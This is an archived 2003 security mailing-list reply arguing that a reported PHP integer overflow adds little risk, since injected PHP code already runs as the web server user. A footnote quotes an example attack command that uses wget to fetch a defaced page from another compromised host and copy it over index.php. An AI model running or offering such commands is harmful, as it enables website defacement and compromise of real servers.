On 2003.04.01 14:29 Sir Mordred wrote: > The implementation of this function suffers from a simple integer overflow > caused by > a very long second argument and could allow a local/remote attacker in the > worst case to gain control over the web server. This is a bit pointless, IMHO. 99% of PHP installations run the PHP code with the user-id of the web server process (usually a low privilege user like 'nobody' or 'apache'). Exploiting one (of many) bugs in PHP to 'gain control over the web server' is like getting a remote shell on a machine and then running a buffer overflow exploit in order just to be able to run commands instead of typing them into the shell directly. If an attacker has the opportunity to execude PHP code of his choice on a target server [1], he does not need to exploit a buffer overflow in PHP just to get the privileges of the web server user - he already runs code with the privileges of that user. And having the ability to run PHP code gives him just about the same level of power as getting a non-root shell on the box. Searching on http://bugs.php.net will give you a lot more ways to crash PHP, and probably a number of these can be used to get a buffer overflow, but I don't think that reporting each of them here will solve anything. Report them to http://bugs.php.net. [1] Usually by exploiting some of the poor programming practices in some PHP applications, misconfigurations, or bugs. See http://www.securityfocus.com/bid/3889 for example. In a typical attack, this is used to execute code, and the code is usually system('wget http://another.exploited.host/defaced-index.php'); system('cp defaced-index.php index.php') or similar. -- Goran Krajnoviæ, dipl. ing. [ Goran.Krajnovicat_private ] Hrvatski Telekom - HThinet
This archive was generated by hypermail 2b30 : Thu Apr 03 2003 - 14:23:49 PST